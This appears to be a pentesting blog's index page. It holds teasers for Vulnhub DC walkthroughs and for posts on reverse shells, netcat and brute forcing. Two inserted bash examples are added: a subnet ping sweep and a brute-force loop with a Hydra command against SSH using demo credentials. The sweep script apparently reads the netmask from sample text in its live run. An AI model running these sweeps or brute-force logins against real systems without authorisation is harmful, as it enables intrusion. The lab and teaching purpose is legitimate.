I took a brief look at DC: 5 and I can read into the file system but it's definitely not obvious taking the next step.  Meanwhile, I just wrapped up DC: 3 and according to part of the description:

"For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily)."

It didn't take long but it did take more than 20 minutes because I decided to learn how to write a Joomla reverse shell plugin.  When I wrote the WordPress Plugin: Reverse Shell, the thought occurred to me to do the same for Joomla but I didn't bother.  Given the easier target, it seemed like a good time.  And I learned something and that's what really matters.

Read more: Vulnhub DC: 3 Walkthrough

A bunch of new releases on Vulnhub over the last few weeks.  Looks like two of the main contributors dumped quite a few new boxes and the one maker in particular has produced some very challenging boxes.  I'm torn between wanting to adhere to my strict allotted time and wanting to get sucked down a rabbit hole.  While I ponder that decision, I'll take a look at DC-6. 

Kicking off with an Nmap scan:

Read more: Vulnhub DC: 6 Walkthrough

I don't do a lot of brute force attacks because other than some low-end products that allow for that kind of thing, most real world devices, services, etc., won't tolerate it.  When I do end up using brute force, it's either with Hydra or Burp but with write-ups, I shy away from pay products only because these tools might not be available to everyone.  Today, I used Hydra, I learned something new, and that makes this write-up worth it on more than one level.

Continuing on with the DC series of boxes, our next target is DC: 4

Kicking off with an Nmap scan:

Read more: Vulnhub DC: 4 Walkthrough

I own most, if not all, of the Hak5 gear because I like to see how each product works and possibly come up with a way to prevent the attack. 

The other day I received an email from them, went to their website, and was reminded of Bash Bunny.  I then wondered what it would take to make a Bash Bunny script to ping scan the network.  Then I wondered what it would take to do that in PowerShell, eliminating the Bunny from the equation.  And that's where this post is headed.

In Linux, I might not necessarily know the exact syntax for what I want to do but I probably have a good idea as to which commands I can use to do it.  I know that from ifconfig, I can get the IP address.  And with various other commands like sed, awk, cut, head, and tail, I can isolate to what I want exactly. 

The following one-liner parses ifconfig for the subnet:
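The post's own one-liner is behind the "Read more" link; what follows is an added example (mine, not the post's) of the same idea in bash: pull the first non-loopback IPv4 address out of ifconfig-style output with awk and cut, reduce it to its /24 prefix, convert the netmask to a CIDR length, and ping-sweep the range. The ifconfig text is constructed for this example, and the sweep itself only runs when the script is invoked with `sweep` so the parsing can be tried offline.

```bash
#!/usr/bin/env bash
# Added example: parse ifconfig for the local subnet, then ping-sweep it.
# Not the post's one-liner; the sample output below is constructed.

SAMPLE_IFCONFIG='eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.101  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::a00:27ff:fe4e:66a1  prefixlen 64  scopeid 0x20<link>
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0'

# prefix_from_ifconfig <text>: first IPv4 "inet" line that is not loopback,
# keep the address ($2), drop the last octet -> "192.168.56"
prefix_from_ifconfig() {
    printf '%s\n' "$1" \
        | awk '/inet / && $2 != "127.0.0.1" { print $2; exit }' \
        | cut -d. -f1-3
}

# netmask_from_ifconfig <text>: the netmask on that same line -> "255.255.255.0"
netmask_from_ifconfig() {
    printf '%s\n' "$1" \
        | awk '/inet / && $2 != "127.0.0.1" { print $4; exit }'
}

# mask_to_cidr <dotted mask>: count the set bits, e.g. 255.255.255.0 -> 24
mask_to_cidr() {
    local IFS=. octet bits=0
    for octet in $1; do
        while [ "$octet" -gt 0 ]; do
            bits=$((bits + (octet & 1)))
            octet=$((octet >> 1))
        done
    done
    echo "$bits"
}

# ping_sweep <prefix>: one echo request per host, in parallel, 1s timeout.
# Only hosts that answer are printed; silent hosts may still be up (ICMP filtered).
ping_sweep() {
    local prefix=$1 host
    for host in $(seq 1 254); do
        ping -c 1 -W 1 "$prefix.$host" >/dev/null 2>&1 \
            && printf '%s.%d is up\n' "$prefix" "$host" &
    done
    wait
}

if [ "${1-}" = "sweep" ]; then
    # Live run: read the real interface instead of the sample text.
    live=$(ifconfig 2>/dev/null || ip -4 -o addr show | awk '{print "inet", $4}')
    prefix=$(prefix_from_ifconfig "$live")
    echo "sweeping $prefix.0/$(mask_to_cidr "$(netmask_from_ifconfig "$SAMPLE_IFCONFIG")")"
    ping_sweep "$prefix"
fi
```

The sweep assumes a /24; a host on a wider subnet would need the CIDR length from `mask_to_cidr` fed into a proper range generator rather than the fixed 1-254 loop, which is the point where it stops being a one-liner.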

Read more: PowerShell Pinger

Up until now, we've discussed using Nmap to scan for open ports, web fuzzers that enumerate directories and files, hash cracking, and we've even taken it a little further toward the victim with brute force attacks where we were able to login to a web application.  But even with the successful login to a web application, I feel like we're sort of just pecking around the perimeter.  Shells take us to that next level where we're able to pierce the skin and get below the surface.

This can be a tricky subject to wrap one's mind around so rather than jumping into the idea of shells immediately, let's start off with leveraging a tool, Netcat, for two way communication.  

To better help (I hope!) keep this straight, I've colored each side.

Read more: Pentesting 101: Shells

I assume when I say "Brute Force Attack" that we all know what I'm talking about.  Just in case -- let's pretend we have a lock, a pocket full of keys, and we try each key in the lock until we exhaust the collection of keys or we are able to open the lock.  Now let's say the lock is a login, the pocket full of keys, the wordlist, and the act of trying the keys is some sort of application to perform the task.

I'm not sure that helps or hurts so I'll move on to what we're attempting to do in our first example. 

I've setup a user on an Ubuntu server and that server has SSH access enabled.  Our victim user is:  bforce and the password is:  123456

The first tool we're going to use is Hydra.  
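Before the Hydra command, here is the lock-and-keys loop written out in bash as an added example (mine, not from the post). The "lock" is a local stand-in so the script runs offline; the wordlist is constructed. The real lock in the post is sshd on the Ubuntu box, and the `hydra_ssh` function at the end shows the equivalent Hydra invocation for that.

```bash
#!/usr/bin/env bash
# Added example: the brute-force loop behind the lock/keys analogy.
# Constructed wordlist, one candidate per line.
WORDLIST='password
letmein
qwerty
123456
admin'

# Stand-in lock: only the post's demo credentials (bforce / 123456) open it.
# Against a live target this is where the SSH login attempt would go.
try_login() {
    [ "$1" = "bforce" ] && [ "$2" = "123456" ]
}

# brute_force <user>: try each key from WORDLIST in order and stop at the
# first success. Prints "user:password after N attempts" and returns 0;
# returns 1 when the pocket of keys is empty.
brute_force() {
    local user=$1 pw attempts=0
    while IFS= read -r pw; do
        attempts=$((attempts + 1))
        if try_login "$user" "$pw"; then
            printf '%s:%s after %d attempts\n' "$user" "$pw" "$attempts"
            return 0
        fi
    done <<EOF
$WORDLIST
EOF
    return 1
}

# The same loop against a live SSH service with Hydra:
#   -l single username, -P wordlist file, -f stop at first valid pair,
#   -t 4 parallel tasks (sshd's MaxStartups throttles anything much higher)
# Usage: hydra_ssh bforce /usr/share/wordlists/rockyou.txt 192.168.56.101
hydra_ssh() {
    hydra -l "$1" -P "$2" -f -t 4 "ssh://$3"
}

if [ "${1-}" = "demo" ]; then
    brute_force bforce || echo "no match"
fi
```

The `-t 4` value is the detail that makes the difference on a real box: an SSH server drops excess connection attempts long before the wordlist is exhausted, and a count of attempts like the one printed above is exactly what a defender sees in `auth.log`.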

Read more: Pentesting 101: Brute Force Attack